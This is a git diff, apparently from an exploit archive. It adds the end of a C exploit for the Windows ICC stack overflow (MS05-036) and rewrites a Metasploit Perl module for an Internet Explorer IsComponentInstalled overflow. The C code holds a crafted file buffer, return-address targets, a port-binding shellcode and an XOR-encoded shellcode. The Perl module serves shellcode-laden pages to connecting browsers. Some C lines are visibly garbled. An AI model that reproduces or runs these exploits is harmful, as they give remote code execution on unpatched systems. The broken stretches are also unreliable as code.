+"\x2E\x4C\x2E\x82\x2E\xB7\x2E\xEE\x2F\x24\x2F\x5A\x2F\x91\x2F\xC7" +"\x2F\xFE\x30\x35\x30\x6C\x30\xA4\x30\xDB\x31\x12\x31\x4A\x31\x82" +"\x31\xBA\x31\xF2\x32\x2A\x32\x63\x32\x9B\x32\xD4\x33\x0D\x33\x46" 
+"\x33\x7F\x33\xB8\x33\xF1\x34\x2B\x34\x65\x34\x9E\x34\xD8\x35\x13" +"\x35\x4D\x35\x87\x35\xC2\x35\xFD\x36\x37\x36\x72\x36\xAE\x36\xE9" +"\x37\x24\x37\x60\x37\x9C\x37\xD7\x38\x14\x38\x50\x38\x8C\x38\xC8" +"\x39\x05\x39\x42\x39\x7F\x39\xBC\x39\xF9\x3A\x36\x3A\x74\x3A\xB2" +"\x3A\xEF\x3B\x2D\x3B\x6B\x3B\xAA\x3B\xE8\x3C\x27\x3C\x65\x3C\xA4" +"\x3C\xE3\x3D\x22\x3D\x61\x3D\xA1\x3D\xE0\x3E\x20\x3E\x60\x3E\xA0" +"\x3E\xE0\x3F\x21\x3F\x61\x3F\xA2\x3F\xE2\x40\x23\x40\x64\x40\xA6" +"\x40\xE7\x41\x29\x41\x6A\x41\xAC\x41\xEE\x42\x30\x42\x72\x42\xB5" +"\x42\xF7\x43\x3A\x43\x7D\x43\xC0\x44\x03\x44\x47\x44\x8A\x44\xCE" +"\x45\x12\x45\x55\x45\x9A\x45\xDE\x46\x22\x46\x67\x46\xAB\x46\xF0" +"\x47\x35\x47\x7B\x47\xC0\x48\x05\x48\x4B\x48\x91\x48\xD7\x49\x1D" +"\x49\x63\x49\xA9\x49\xF0\x4A\x37\x4A\x7D\x4A\xC4\x4B\x0C\x4B\x53" +"\x4B\x9A\x4B\xE2\x4C\x2A\x4C\x72\x4C\xBA\x4D\x02\x4D\x4A\x4D\x93" +"\x4D\xDC\x4E\x25\x4E\x6E\x4E\xB7\x4F\x00\x4F\x49\x4F\x93\x4F\xDD" +"\x50\x27\x50\x71\x50\xBB\x51\x06\x51\x50\x51\x9B\x51\xE6\x52\x31" +"\x52\x7C\x52\xC7\x53\x13\x53\x5F\x53\xAA\x53\xF6\x54\x42\x54\x8F" +"\x54\xDB\x55\x28\x55\x75\x55\xC2\x56\x0F\x56\x5C\x56\xA9\x56\xF7" +"\x57\x44\x57\x92\x57\xE0\x58\x2F\x58\x7D\x58\xCB\x59\x1A\x59\x69" +"\x59\xB8\x5A\x07\x5A\x56\x5A\xA6\x5A\xF5\x5B\x45\x5B\x95\x5B\xE5" +"\x5C\x35\x5C\x86\x5C\xD6\x5D\x27\x5D\x78\x5D\xC9\x5E\x1A\x5E\x6C" +"\x5E\xBD\x5F\x0F\x5F\x61\x5F\xB3\x60\x05\x60\x57\x60\xAA\x60\xFC" +"\x61\x4F\x61\xA2\x61\xF5\x62\x49\x62\x9C\x62\xF0\x63\x43\x63\x97" +"\x63\xEB\x64\x40\x64\x94\x64\xE9\x65\x3D\x65\x92\x65\xE7\x66\x3D" +"\x66\x92\x66\xE8\x67\x3D\x67\x93\x67\xE9\x68\x3F\x68\x96\x68\xEC" +"\x69\x43\x69\x9A\x69\xF1\x6A\x48\x6A\x9F\x6A\xF7\x6B\x4F\x6B\xA7" +"\x6B\xFF\x6C\x57\x6C\xAF\x6D\x08\x6D\x60\x6D\xB9\x6E\x12\x6E\x6B" +"\x6E\xC4\x6F\x1E\x6F\x78\x6F\xD1\x70\x2B\x70\x86\x70\xE0\x71\x3A" +"\x71\x95\x71\xF0\x72\x4B\x72\xA6\x73\x01\x73\x5D\x73\xB8\x74\x14" +"\x74\x70\x74\xCC\x75\x28\x75\x85\x75\xE1\x76\x3E\x76\x9B\x76\xF8" 
+"\x77\x56\x77\xB3\x78\x11\x78\x6E\x78\xCC\x79\x2A\x79\x89\x79\xE7" +"\x7A\x46\x7A\xA5\x7B\x04\x7B\x63\x7B\xC2\x7C\x21\x7C\x81\x7C\xE1" +"\x7D\x41\x7D\xA1\x7E\x01\x7E\x62\x7E\xC2\x7F\x23\x7F\x84\x7F\xE5" +"\x80\x47\x80\xA8\x81\x0A\x81\x6B\x81\xCD\x82\x30\x82\x92\x82\xF4" +"\x83\x57\x83\xBA\x84\x1D\x84\x80\x84\xE3\x85\x47\x85\xAB\x86\x0E" +"\x86\x72\x86\xD7\x87\x3B\x87\x9F\x88\x04\x88\x69\x88\xCE\x89\x33" +"\x89\x99\x89\xFE\x8A\x64\x8A\xCA\x8B\x30\x8B\x96\x8B\xFC\x8C\x63" +"\x8C\xCA\x8D\x31\x8D\x98\x8D\xFF\x8E\x66\x8E\xCE\x8F\x36\x8F\x9E" +"\x90\x06\x90\x6E\x90\xD6\x91\x3F\x91\xA8\x92\x11\x92\x7A\x92\xE3" +"\x93\x4D\x93\xB6\x94\x20\x94\x8A\x94\xF4\x95\x5F\x95\xC9\x96\x34" +"\x96\x9F\x97\x0A\x97\x75\x97\xE0\x98\x4C\x98\xB8\x99\x24\x99\x90" +"\x99\xFC\x9A\x68\x9A\xD5\x9B\x42\x9B\xAF\x9C\x1C\x9C\x89\x9C\xF7" +"\x9D\x64\x9D\xD2\x9E\x40\x9E\xAE\x9F\x1D\x9F\x8B\x9F\xFA\xA0\x69" +"\xA0\xD8\xA1\x47\xA1\xB6\xA2\x26\xA2\x96\xA3\x06\xA3\x76\xA3\xE6" +"\xA4\x56\xA4\xC7\xA5\x38\xA5\xA9\xA6\x1A\xA6\x8B\xA6\xFD\xA7\x6E" +"\xA7\xE0\xA8\x52\xA8\xC4\xA9\x37\xA9\xA9\xAA\x1C\xAA\x8F\xAB\x02" +"\xAB\x75\xAB\xE9\xAC\x5C\xAC\xD0\xAD\x44\xAD\xB8\xAE\x2D\xAE\xA1" +"\xAF\x16\xAF\x8B\xB0\x00\xB0\x75\xB0\xEA\xB1\x60\xB1\xD6\xB2\x4B" +"\xB2\xC2\xB3\x38\xB3\xAE\xB4\x25\xB4\x9C\xB5\x13\xB5\x8A\xB6\x01" +"\xB6\x79\xB6\xF0\xB7\x68\xB7\xE0\xB8\x59\xB8\xD1\xB9\x4A\xB9\xC2" +"\xBA\x3B\xBA\xB5\xBB\x2E\xBB\xA7\xBC\x21\xBC\x9B\xBD\x15\xBD\x8F" +"\xBE\x0A\xBE\x84\xBE\xFF\xBF\x7A\xBF\xF5\xC0\x70\xC0\xEC\xC1\x67" +"\xC1\xE3\xC2\x5F\xC2\xDB\xC3\x58\xC3\xD4\xC4\x51\xC4\xCE\xC5\x4B" +"\xC5\xC8\xC6\x46\xC6\xC3\xC7\x41\xC7\xBF\xC8\x3D\xC8\xBC\xC9\x3A" +"\xC9\xB9\xCA\x38\xCA\xB7\xCB\x36\xCB\xB6\xCC\x35\xCC\xB5\xCD\x35" +"\xCD\xB5\xCE\x36\xCE\xB6\xCF\x37\xCF\xB8\xD0\x39\xD0\xBA\xD1\x3C" +"\xD1\xBE\xD2\x3F\xD2\xC1\xD3\x44\xD3\xC6\xD4\x49\xD4\xCB\xD5\x4E" +"\xD5\xD1\xD6\x55\xD6\xD8\xD7\x5C\xD7\xE0\xD8\x64\xD8\xE8\xD9\x6C" +"\xD9\xF1\xDA\x76\xDA\xFB\xDB\x80\xDC\x05\xDC\x8A\xDD\x10\xDD\x96" 
+"\xDE\x1C\xDE\xA2\xDF\x29\xDF\xAF\xE0\x36\xE0\xBD\xE1\x44\xE1\xCC" +"\xE2\x53\xE2\xDB\xE3\x63\xE3\xEB\xE4\x73\xE4\xFC\xE5\x84\xE6\x0D" +"\xE6\x96\xE7\x1F\xE7\xA9\xE8\x32\xE8\xBC\xE9\x46\xE9\xD0\xEA\x5B" +"\xEA\xE5\xEB\x70\xEB\xFB\xEC\x86\xED\x11\xED\x9C\xEE\x28\xEE\xB4" +"\xEF\x40\xEF\xCC\xF0\x58\xF0\xE5\xF1\x72\xF1\xFF\xF2\x8C\xF3\x19" +"\xF3\xA7\xF4\x34\xF4\xC2\xF5\x50\xF5\xDE\xF6\x6D\xF6\xFB\xF7\x8A" +"\xF8\x19\xF8\xA8\xF9\x38\xF9\xC7\xFA\x57\xFA\xE7\xFB\x77\xFC\x07" +"\xFC\x98\xFD\x29\xFD\xBA\xFE\x4B\xFE\xDC\xFF\x6D\xFF\xFF\xFF\xFE" +"\x00\x1F\x4C\x45\x41\x44\x20\x54\x65\x63\x68\x6E\x6F\x6C\x6F\x67" +"\x69\x65\x73\x20\x49\x6E\x63\x2E\x20\x56\x31\x2E\x30\x31\x00\xFF" +"\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x03\x03" +"\x02\x03\x04\x07\x04\x04\x03\x03\x04\x08\x06\x06\x05\x07\x0A\x09" +"\x0A\x0A\x0A\x09\x0A\x09\x0B\x0C\x10\x0E\x0B\x0C\x0F\x0C\x09\x0A" +"\x0E\x13\x0E\x0F\x11\x11\x12\x12\x12\x0B\x0D\x14\x15\x14\x12\x15" +"\x10\x12\x12\x11\x01\x03\x03\x03\x04\x03\x04\x08\x04\x04\x08\x11" +"\x0B\x0A\x0B\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11" +"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11" +"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11" +"\x11\x11\x11\x11\x11\xFF\xC4\x01\xA2\x00\x00\x01\x05\x01\x01\x01" +"\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05" +"\x06\x07\x08\x09\x0A\x0B\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01" +"\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08" +"\x09\x0A\x0B\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04" +"\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06" +"\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08\x23\x42\xB1\xC1" +"\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17\x18\x19\x1A" +"\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45" +"\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65" +"\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85" 
+"\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3" +"\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA" +"\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8" +"\xD9\xDA\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4" +"\xF5\xF6\xF7\xF8\xF9\xFA\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07" +"\x05\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31" +"\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1" +"\xB1\xC1\x09\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1" +"\x25\xF1\x17\x18\x19\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39" +"\x3A\x43\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59" +"\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79" +"\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97" +"\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5" +"\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3" +"\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA" +"\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xC0\x00\x11\x08\x01\x20" +"\x01\xE0\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01\xFF\xDA\x00\x0C" +"\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xFD\xFC\xA0\x02\x80\x0A" +"\x00\x28\x00\xA0\x02\x80\x0A\x00\x28\x00\xA0\x02\x80\x0A\x00\x28"; + +struct { +char *os; +long jmpADD; +long writeable_add; +} + +targets[] = { +{ "Windows XP without SP eng/rus", 0x77E9FC79, 0x00064000 }, +{ "Windows XP SP1 eng/rus ", 0x77E9AE59, 0x00064000 }, +{ "Windows 2000 SP0 ", 0x77f8948b, 0x00064000 }, +{ "Crash Explorer ", 0x41424344, 0x00064000 }, +{ "Dummy (crash all) ", 0x0, 0x00064000 }, +}, v; + +unsigned char shellcode[] = +"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e" +"\xb0\x8c\x35\x83\xeb\xfc\xe2\xf4\xa2\xda\x67\x78\xb6\x49\x73\xca" +"\xa1\xd0\x07\x59\x7a\x94\x07\x70\x62\x3b\xf0\x30\x26\xb1\x63\xbe" +"\x11\xa8\x07\x6a\x7e\xb1\x67\x7c\xd5\x84\x07\x34\xb0\x81\x4c\xac" 
+"\xf2\x34\x4c\x41\x59\x71\x46\x38\x5f\x72\x67\xc1\x65\xe4\xa8\x1d" +"\x2b\x55\x07\x6a\x7a\xb1\x67\x53\xd5\xbc\xc7\xbe\x01\xac\x8d\xde" +"\x5d\x9c\x07\xbc\x32\x94\x90\x54\x9d\x81\x57\x51\xd5\xf3\xbc\xbe" +"\x1e\xbc\x07\x45\x42\x1d\x07\x75\x56\xee\xe4\xbb\x10\xbe\x60\x65" +"\xa1\x66\xea\x66\x38\xd8\xbf\x07\x36\xc7\xff\x07\x01\xe4\x73\xe5" +"\x36\x7b\x61\xc9\x65\xe0\x73\xe3\x01\x39\x69\x53\xdf\x5d\x84\x37" +"\x0b\xda\x8e\xca\x8e\xd8\x55\x3c\xab\x1d\xdb\xca\x88\xe3\xdf\x66" +"\x0d\xe3\xcf\x66\x1d\xe3\x73\xe5\x38\xd8\x81\x33\x38\xe3\x05\xd4" +"\xcb\xd8\x28\x2f\x2e\x77\xdb\xca\x88\xda\x9c\x64\x0b\x4f\x5c\x5d" +"\xfa\x1d\xa2\xdc\x09\x4f\x5a\x66\x0b\x4f\x5c\x5d\xbb\xf9\x0a\x7c" +"\x09\x4f\x5a\x65\x0a\xe4\xd9\xca\x8e\x23\xe4\xd2\x27\x76\xf5\x62" +"\xa1\x66\xd9\xca\x8e\xd6\xe6\x51\x38\xd8\xef\x58\xd7\x55\xe6\x65" +"\x07\x99\x40\xbc\xb9\xda\xc8\xbc\xbc\x81\x4c\xc6\xf4\x4e\xce\x18" +"\xa0\xf2\xa0\xa6\xd3\xca\xb4\x9e\xf5\x1b\xe4\x47\xa0\x03\x9a\xca" +"\x2b\xf4\x73\xe3\x05\xe7\xde\x64\x0f\xe1\xe6\x34\x0f\xe1\xd9\x64" +"\xa1\x60\xe4\x98\x87\xb5\x42\x66\xa1\x66\xe6\xca\xa1\x87\x73\xe5" +"\xd5\xe7\x70\xb6\x9a\xd4\x73\xe3\x0c\x4f\x5c\x5d\xae\x3a\x88\x6a" +"\x0d\x4f\x5a\xca\x8e\xb0\x8c\x35"; + + +char shellcod2e[]= "\xeb\x0e\x5b\x4b\x33\xc9\xb1\xf1\x80\x34\x0b\xee\xe2\xfa\xeb\x05" +"\xe8\xed\xff\xff\xff" +/* 220 bytes shellcode, xor with 0xee */ +"\x07\x4a\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65" +"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\xaa\xee\xee\xee" +"\x0c\x17\x86\x81\x80\xee\xee\x86\x9b\x9c\x82\x83\xba\x11\xf8\x65" +"\x06\x06\xc0\xee\xee\xee\x6d\x02\xce\x65\x32\x84\xce\xbd\x11\xb8" +"\xea\x29\xea\xed\xb2\x8f\xc0\x8b\x29\xaa\xed\xea\x96\x8b\xee\xee" +"\xdd\x2e\xbe\xbe\xbd\xb9\xbe\x11\xb8\xfe\x65\x32\xbe\xbd\x11\xb8" +"\xe6\x11\xb8\xe2\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0\x96\xed\x1b\xb8" +"\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b\xdd\x35\xe1\x50" +"\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05\x1f\xd5\xf1\x9b" 
+"\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65\xb0\xf2\xed\x33"
+"\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xb9\x11\x11\x11\x60\xa0"
+"\xe0\x02\x2f\x97\x0b\x56\x76\x10\x64\xe0\x90\x36\x0c\x9d\xd8\xf4"
+"\xc1\x9e\x86\x9a\x9a\x9e\xd4\xc1\xc1\xdf\xdc\xd9\xc0\xde\xc0\xde"
+"\xc0\xdf\xc1\x9a\x8b\x9d\x9a\xc0\x8b\x96\x8b\xee";
+
+
+unsigned char b[4];
+
+
+DWORD t2b(DWORD pBuf)
+{
+
+DWORD ret;
+
+*((char*)&ret + 0) = *((char*)&pBuf +3);
+*((char*)&ret + 1) = *((char*)&pBuf +2);
+*((char*)&ret + 2) = *((char*)&pBuf +1);
+*((char*)&ret + 3) = *((char*)&pBuf);
+
+return ret;
+
+}
+
+void get_bytes(long word)
+{
+b[0]=word&0xff;
+b[1]=(word>>8)& 0xff;
+b[2]=(word>>16)&0xff;
+b[3]=(word>>24)&0xff;
+}
+
+void err_exit(char *s)
+{
+printf("%s\n",s);
+exit(0);
+}
+
+
+
+void hexdump(char * pbuf,unsigned int size)
+{
+unsigned int i = 0;
+for (; i < size ; i++){
+printf("%.2X ", (unsigned char) pbuf[i]);
+if( (i+1) %16 == 0)
+putchar('\n');
+}
+
+return;
+}
+
+void buildfile()
+{
+int i=0;
+FILE *fd;
+
+if ((fd=fopen(FNAME,"wb"))==NULL) {
+err_exit("-> Failed to generate file...");
+}
+
+for(;i '%s' generated.\n",FNAME);
+printf("-> shellcode binds 3334 port.\n");
+
+}
+
+void dword_revert(char * p,unsigned int size)
+{
+DWORD * ptr = &p;
+int i = 0;
+char * q = p + size; //end
+
+for(; p <= q; p +=4)
+{
+*p ^= *(p+3);
+*(p+3) ^= *p;
+*p ^= *(p+3);
+
+*(p+1) ^= *(p+2);
+*(p+2) ^= *(p+1);
+*(p+1) ^= *(p+2);
+}
+
+
+return;
+}
+
+void list_target()
+{
+unsigned int i = 0 ;
+
+printf("\nTargets \t\t\n");
+while(targets[i].jmpADD != NULL){
+printf("#%d\t%s\n", i+1, targets[i].os);
+i++;
+}
+return;
+}
+
+
+
+int main(int argc, char *argv[])
+{
+int i=0, t=TARGET, size=0;
+int shal = 0;
+unsigned int sc_size = strlen(shellcode);
+unsigned int tag_size = stack_land_offset - tag_content_offset + 1 + sc_size ;
+long fRetaddr = 0x00;
+
+if (argc < 2) {
+printf("\n\n");
+
+printf("* Windows ICC stack overflow exploit (MS05-36)\n");
+printf("* Code Execution Exploit\n");
+printf("* (c) 
Darkeagle [ private code ]\n");
+printf("* usage -> ms05-036 (jmp/call esp)\n");
+list_target() ;
+exit(0);
+}
+
+t=atoi(argv[1]);
+
+if ( argc == 3 )
+sscanf(argv[2], "0x%x", &fRetaddr);
+
+memset(buff + tag_content_offset, 0x90,tag_size);
+
+*(DWORD*)(buff + no_access_violate2) = t2b(targets[t-1].writeable_add);
+*(DWORD*)(buff + no_access_violate) = t2b(0x4);
+if ( fRetaddr == 0x00 )
+{
+*(DWORD*)(buff + ret_addr_offset) = t2b(targets[t-1].jmpADD);
+} else {
+*(DWORD*)(buff + ret_addr_offset) = t2b(fRetaddr);
+}
+strncpy(buff + stack_land_offset, shellcode, sc_size);
+dword_revert(buff + stack_land_offset, sc_size);
+
+tag_size = (tag_size >> 2 << 2) + 4;
+printf("current size: 0x%.8X\n",tag_size);
+*(DWORD*)(buff + content_size_offset) = t2b(tag_size);
+
+buildfile();
+
+return 0;
+
+}
+
+// milw0rm.com [2006-02-17]
diff --git a/platforms/windows/remote/1536.pm b/platforms/windows/remote/1536.pm
index eb6adc580..fa6aaffe4 100755
--- a/platforms/windows/remote/1536.pm
+++ b/platforms/windows/remote/1536.pm
@@ -1,224 +1,223 @@ - -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::ie_iscomponentinstalled; - -use strict; -use base "Msf::Exploit"; -use Pex::Text; -use IO::Socket::INET; -use IPC::Open3; - -my $advanced = - { - 'Gzip' => [1, 'Enable gzip content encoding'], - 'Chunked' => [1, 'Enable chunked transfer encoding'], - }; - -my $info = - { - 'Name' => 'Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow', - 'Version' => '$Revision: 1.2 $', - 'Authors' => - [ - 'H D Moore ', - ], - - 'Description' => - Pex::Text::Freeform(qq{ - This module exploits a stack overflow in Internet Explorer. This bug was - patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC. 
-}), - - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32' ], - 'Priv' => 0, - - 'AutoOpts' => { 'EXITFUNC' => 'thread' }, - 'UserOpts' => - { - 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], - 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], - }, - - 'Payload' => - { - 'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff", - 'Space' => 512, - 'BadChars' => "\x00\x5c\x0a\x0d\x22", - 'Keys' => ['-bind'], - }, - 'Refs' => - [ - ], - - 'DefaultTarget' => 0, - 'Targets' => - [ - [ 'Windows XP SP0 with Internet Explorer 6.0', 0x71aa16e5 ] - ], - - 'Keys' => [ 'ie' ], - - 'DisclosureDate' => 'Feb 24 2006', - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit -{ - my $self = shift; - my $server = IO::Socket::INET->new( - LocalHost => $self->GetVar('HTTPHOST'), - LocalPort => $self->GetVar('HTTPPORT'), - ReuseAddr => 1, - Listen => 1, - Proto => 'tcp' - ); - my $client; - - # Did the listener create fail? - if (not defined($server)) { - $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); - return; - } - - my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? - Pex::Utils::SourceIP('1.2.3.4') : - $self->GetVar('HTTPHOST'); - - $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". 
$self->GetVar('HTTPPORT') ."/"); - - while (defined($client = $server->accept())) { - $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); - } - - return; -} - -sub HandleHttpClient -{ - my $self = shift; - my $fd = shift; - - # Set the remote host information - my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); - - - # Read the HTTP command - my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); - my $agent; - - # Read in the HTTP headers - while ((my $line = $fd->RecvLine(10))) { - - $line =~ s/^\s+|\s+$//g; - - my ($var, $val) = split(/\:/, $line, 2); - - # Break out if we reach the end of the headers - last if (not defined($var) or not defined($val)); - - $agent = $val if $var =~ /User-Agent/i; - } - - $self->PrintLine("[*] Client connected from $rhost:$rport ($agent)"); - - my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); - - $fd->Close(); -} - -sub GenerateHTML { - my $self = shift; - my $target = $self->Targets->[$self->GetVar('TARGET')]; - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $pattern = Pex::Text::AlphaNumText(8192); - - substr($pattern, 755, 4, pack('V', $target->[1] )); - substr($pattern, 755 + 2888, length($shellcode), $shellcode); - - my $data = qq| - - - One second please... - - - -One second please... - - -|; - return $data; -} - -sub BuildResponse { - my ($self, $content) = @_; - - my $response = - "HTTP/1.1 200 OK\r\n" . - "Content-Type: text/html\r\n"; - - if ($self->GetVar('Gzip')) { - $response .= "Content-Encoding: gzip\r\n"; - $content = $self->Gzip($content); - } - if ($self->GetVar('Chunked')) { - $response .= "Transfer-Encoding: chunked\r\n"; - $content = $self->Chunk($content); - } else { - $response .= 'Content-Length: ' . length($content) . "\r\n" . - "Connection: close\r\n"; - } - - $response .= "\r\n" . 
$content; - - return $response; -} - -sub Chunk { - my ($self, $content) = @_; - - my $chunked; - while (length($content)) { - my $chunk = substr($content, 0, int(rand(10) + 1), ''); - $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; - } - $chunked .= "0\r\n\r\n"; - - return $chunked; -} - -sub Gzip { - my $self = shift; - my $data = shift; - my $comp = int(rand(5))+5; - - my($wtr, $rdr, $err); - - my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); - print $wtr $data; - close ($wtr); - local $/; - - return (<$rdr>); -} -1; - - -# milw0rm.com [2006-02-28] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::ie_iscomponentinstalled; + +use strict; +use base "Msf::Exploit"; +use Pex::Text; +use IO::Socket::INET; +use IPC::Open3; + +my $advanced = + { + 'Gzip' => [1, 'Enable gzip content encoding'], + 'Chunked' => [1, 'Enable chunked transfer encoding'], + }; + +my $info = + { + 'Name' => 'Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow', + 'Version' => '$Revision: 1.2 $', + 'Authors' => + [ + 'H D Moore ', + ], + + 'Description' => + Pex::Text::Freeform(qq{ + This module exploits a stack overflow in Internet Explorer. This bug was + patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC. 
+}), + + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32' ], + 'Priv' => 0, + + 'AutoOpts' => { 'EXITFUNC' => 'thread' }, + 'UserOpts' => + { + 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], + 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], + }, + + 'Payload' => + { + 'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff", + 'Space' => 512, + 'BadChars' => "\x00\x5c\x0a\x0d\x22", + 'Keys' => ['-bind'], + }, + 'Refs' => + [ + ], + + 'DefaultTarget' => 0, + 'Targets' => + [ + [ 'Windows XP SP0 with Internet Explorer 6.0', 0x71aa16e5 ] + ], + + 'Keys' => [ 'ie' ], + + 'DisclosureDate' => 'Feb 24 2006', + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit +{ + my $self = shift; + my $server = IO::Socket::INET->new( + LocalHost => $self->GetVar('HTTPHOST'), + LocalPort => $self->GetVar('HTTPPORT'), + ReuseAddr => 1, + Listen => 1, + Proto => 'tcp' + ); + my $client; + + # Did the listener create fail? + if (not defined($server)) { + $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); + return; + } + + my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? + Pex::Utils::SourceIP('1.2.3.4') : + $self->GetVar('HTTPHOST'); + + $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". 
$self->GetVar('HTTPPORT') ."/"); + + while (defined($client = $server->accept())) { + $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); + } + + return; +} + +sub HandleHttpClient +{ + my $self = shift; + my $fd = shift; + + # Set the remote host information + my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); + + + # Read the HTTP command + my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); + my $agent; + + # Read in the HTTP headers + while ((my $line = $fd->RecvLine(10))) { + + $line =~ s/^\s+|\s+$//g; + + my ($var, $val) = split(/\:/, $line, 2); + + # Break out if we reach the end of the headers + last if (not defined($var) or not defined($val)); + + $agent = $val if $var =~ /User-Agent/i; + } + + $self->PrintLine("[*] Client connected from $rhost:$rport ($agent)"); + + my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); + + $fd->Close(); +} + +sub GenerateHTML { + my $self = shift; + my $target = $self->Targets->[$self->GetVar('TARGET')]; + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $pattern = Pex::Text::AlphaNumText(8192); + + substr($pattern, 755, 4, pack('V', $target->[1] )); + substr($pattern, 755 + 2888, length($shellcode), $shellcode); + + my $data = qq| + + + One second please... + + + +One second please... + + +|; + return $data; +} + +sub BuildResponse { + my ($self, $content) = @_; + + my $response = + "HTTP/1.1 200 OK\r\n" . + "Content-Type: text/html\r\n"; + + if ($self->GetVar('Gzip')) { + $response .= "Content-Encoding: gzip\r\n"; + $content = $self->Gzip($content); + } + if ($self->GetVar('Chunked')) { + $response .= "Transfer-Encoding: chunked\r\n"; + $content = $self->Chunk($content); + } else { + $response .= 